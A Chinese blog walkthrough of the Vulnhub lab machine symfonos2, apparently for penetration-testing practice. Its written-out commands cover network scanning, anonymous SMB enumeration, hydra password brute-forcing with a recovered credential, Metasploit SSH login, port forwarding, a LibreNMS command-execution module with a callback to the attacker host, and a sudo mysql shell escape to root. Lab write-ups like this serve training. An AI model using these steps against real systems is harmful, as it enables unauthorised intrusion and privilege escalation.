symfonos2

最新推荐文章于 2024-08-13 19:54:40 发布
最新推荐文章于 2024-08-13 19:54:40 发布
阅读量236 收藏 3
点赞数 5
分类专栏: vulnhub 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/141141439
版权

一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

nmap 192.168.236.174 -p- -A

3、目录扫描

没什么发现

dirb http://192.168.236.174

二、漏洞探测

访问80端口,没发现

查看共享文件夹,发现 anonymous 共享文件夹

smbclient -L 192.168.236.174

查看 anonymous 文件夹,在 backups 目录下发现 log.txt 文件

smbclient //192.168.236.174/anonymous

下载此文件查看,发现一个 aeolus 用户

get log.txt
more log.txt

尝试使用hydra进行密码爆破

hydra -l aeolus -P /usr/share/wordlists/rockyou.txt ftp://192.168.236.174

aeolus:sergioteamo

三、GetShell

ssh登录

ssh aeolus@192.168.236.174

对命令有限制

使用 msf 工具进行 ssh 登录,使用 metasploit 工具,查找 ssh 登录模块

msfconsole
search ssh_login

使用第一个,看一下需要配置的选项

use 0
show options

设置目标地址、账号、密码然后运行

set  rhosts 192.168.236.174
set username aeolus
set password sergioteamo
run

将 sessions 会话升级为一个 meterpreter 会话 查看 sessions 会话

sessions

升级会话,使用新会话

sessions -u 1

查看网络相关信息,发现8080端口只允许靶机本身连接

netstat

进行端口转发,将本地的9999端口映射到靶机的8080端口

ssh -Nf -L 9999:127.0.0.1:8080 aeolus@192.168.236.174
将本地机器的9999端口映射到远程机器的127.0.0.1的8080端口,执行此命令后,本地机器的9999端口将被转发到远程机器的8080端口。可以通过在本地浏览器中访问http://localhost:9999来访问远程机器上的服务。

netstat -tulp

访问本地 9999 端口

发现网站使用的是libreNMS 系统,使用 msf 查看一下该系统是否存在漏洞

search libreNMS

发现两个命令执行漏洞,使用第二个,查看一下需要设置的选项

use 1
show options

设置参数

set password sergioteamo
set rhosts 127.0.0.1
set rport 9999
set username aeolus
set lhost 192.168.236.137
run

四、提权

使用交互式 shell

python -c "import pty;pty.spawn('/bin/bash')"

查看具有 root 权限的命令

sudo -l

发现可以用 root 权限执行 mysql ,执行以下命令可成功提权

sudo mysql -e '\! /bin/sh'

查看proof.txt 文件

花椒椒椒
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
symfonos2 靶机
m0_62202418的博客
11-28 942
ssh -Nf -L 8888:127.0.0.1:8080 aeolus@10.1.1.147 将本地机器的8888端口映射到远程机器的127.0.0.1的8080端口 执行此命令后,本地机器的8888端口将被转发到远程机器的8080端口。知道了账号密码,那就使用msf 工具进行SSH登录启动metasploit 工具。靶机开放了21、22、80、139、445端口。将本地的9999端口映射到靶机的8080端口。使用爆破出来的账密进行ssh 登录。发现了一个叫aeolus 的用户。
Vulnhub靶机 Symfonos 2
菜浪马废的博客
09-25 402
扫出用户名aeolus aeolus:sergioteamo 用来登录ssh试试 转发8080端口 提权成功 先是enum4linux找到用户名 ftp爆破 发现可以用来登录ssh 找到运行的8080端口 ssh端口转发 访问后发现是cms 找到漏洞 得到下一个用户权限 sudo -l找到mysql gtfobins上找到提权方法 得到root权限 ...
symfonos2靶机
hqy250019的博客
08-13 393
使用 msf 工具进行 ssh 登录,使用 metasploit 工具,查找 ssh 登录模块。查看 anonymous 文件夹,在 backups 目录下发现 log.txt 文件。发现网站使用的是libreNMS 系统,使用 msf 查看一下该系统是否存在漏洞。下载此文件查看,发现一个 aeolus 用户,在本地目录下打开。进行端口转发,将本地的9999端口映射到靶机的8080端口。发现两个命令执行漏洞,使用第二个,查看一下需要设置的选项。使用第一个,看一下需要配置的选项。升级会话,使用新会话。
symfonos2 打靶渗透
m0_65112983的博客
08-05 525
symfonos2 打靶渗透
SYMFONOS3.1:Desarrollo del CTF SYMFONOS 3.1
04-05
2.埃斯卡尼奥·德波多斯 nmap -n -P0 -p- -sC -sV -O -T5 -oA full 10.10.10.153 Nmap scan report for 10.10.10.153 Host is up (0.00047s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21...
SYMFONOS4:CTF SYMFONOS4的开发
04-08
2.埃斯卡尼奥·德波多斯 # Nmap 7.91 scan initiated Sun Apr 4 17:41:16 2021 as: nmap -n -P0 -p- -sS -sC -sV -vv -T5 -oA full 192.168.1.136 Nmap scan report for 192.168.1.136 Host is up, received arp-...
SYMFONOS:Desarrollo del CTF SYMFONOS
03-28
SYMONONOS Desarrollo del CTF SYMFONOS1.虚拟机配置Descargar la VM: : 2.埃斯卡尼奥·德波多斯2.1。 Escaneo de Puertos TCP # Nmap 7.91 scan initiated Fri Mar 26 18:41:34 2021 as: nmap -n -P0 -p- -sC -sV...
SYMFONOS-源码.rar
10-10
2. **Linux内核**:SYMFONOS基于Linux内核,因此开发者可以学习到Linux内核的模块化设计、中断处理、调度算法等。 3. **C/C++编程**:操作系统开发主要使用C和C++语言,通过阅读源码,可以深入学习这两种语言在系统...
shellshockcgitool:CGI脚本Shellshock开发工具
03-08
CGI脚本ShellShock开发工具。 什么是Shellshock? Shellshock是Bash版本1.0.3-4.3中的关键错误,可以使攻击者执行任意命令。 Bash的漏洞版本错误地执行了遵循存储在环境变量中的函数... 为Symfonos3 Vulnhub机器开发!
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8388
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
机器学习模型评估与优化:常用方法与实践技巧.md
08-15
机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器学习模型机器
强化学习算法介绍.docx
08-15
强化学习
SpringBoot+Vue在线商城(电子商城)系统 java毕业设计 源码+sql脚本+论文 完整版
08-15
这个是完整源码 SpringBoot + Vue实现 SpringBoot+Vue在线商城(电子商城)系统 java毕业设计 源码+sql脚本+论文 完整版 数据库是mysql 随着互联网技术的发展和普及,电子商务在全球范围内得到了迅猛的发展,已经成为了一种重要的商业模式和生活方式。电子商城是电子商务的重要组成部分,是一个基于互联网的商业模式和交易平台,通过网络进行产品和服务的销售。电子商城已成为了线上交易和消费的主要方式,人们可以方便快捷地买到自己想要的商品和服务,并在家中享受线上购物的便利性和舒适性。 基于这个背景,我们决定开发一个功能强大、易于使用、可靠性高的商城系统,以满足用户在线购物的需求。这个商城系统将支持多种商品和服务的销售、多种支付方式和多种物流配送方式,提供优惠券和积分等扩展功能,为用户提供舒适的购物体验和服务。同时,我们还将采用最新的技术和开发模式,在保证系统稳定运行的同时,不断推出新的功能和特性,以满足用户不断增长的需求和期望。基于这个背景,我们决定开发一个功能强大、易于使用、可靠性高的商城系统,以满足用户在线购物的需求。这个商城系统将支持多种商品和服务的销售、多
【无人机控制】基于matlab模型预测控制和反馈线性化控制系统的四旋翼无人机【含Matlab源码 7228期】.mp4
08-15
Matlab研究室上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
“人力资源+大数据+薪酬报告+涨薪调薪”
08-15
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
烟火数据集烟火数据集烟火数据集
最新发布
08-15
烟火数据集烟火数据集烟火数据集
基于SSM++jsp的会员管理系统
08-15
内容概要 本会员管理系统基于SSM(Spring、Spring MVC、MyBatis)框架和JSP技术开发,专为企业和机构提供会员信息的高效管理解决方案。系统包含会员信息录入、等级管理、积分管理、活动记录、消费统计等多项功能模块,通过简洁易用的界面实现会员信息的集中化管理。系统支持对会员的动态跟踪和分析,帮助企业更好地了解会员行为和需求,优化会员服务。同时,系统具备良好的可扩展性和安全性,采用分层架构设计,方便后期的维护和功能拓展。 适用人群 本系统适用于各类企业、俱乐部、协会以及需要进行会员管理的机构,尤其是商场、健身房、美容院、教育机构等经常需要与会员保持紧密联系的行业。对于企业管理者来说,系统可以简化会员管理流程,提升运营效率。市场营销部门可以利用系统中的会员数据进行精准营销,提高活动效果。IT技术人员则可以根据具体需求,对系统进行二次开发,以满足企业的特殊要求。 使用场景及目标 该系统适用于多个使用场景,包括会员信息的初次录入与后续管理、会员积分的发放与兑换、会员等级的自动升级、活动邀请与参与记录,以及消费统计与分析等。系统的目标是通过数字化手段,实现会员信息的集中管理,
基于springboot的校园社团信息系统 源码+数据库(毕业设计)
08-15
基于Vue.js和SpringBoot的校园社团信息系统是一个功能全面、易于使用的校园社团管理平台,它分为管理后台和用户网页端,为管理员和普通用户提供了丰富的功能。管理员可以通过管理后台进行社团分类、社团信息的编辑、社团成员的管理和社团活动的发布等操作,同时还可以查看活动报名情况,方便对社团活动进行有效管理。普通用户则可以通过用户网页端浏览社团信息、参与社团活动、报名活动等。系统还特别为学生社长提供了社团管理的权限,使得社团管理更加高效。此外,系统还提供了社团成员管理、活动报名等模块,使得社团活动更加有序,方便学生参与。 录屏:https://www.bilibili.com/video/BV1n6421c7Gi 教程:https://space.bilibili.com/417412814/channel/collectiondetail?sid=2242844
wav简谱播放程序QZQ-2024-8-15.zip
08-15
wav简谱播放程序QZQ-2024-8-15
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值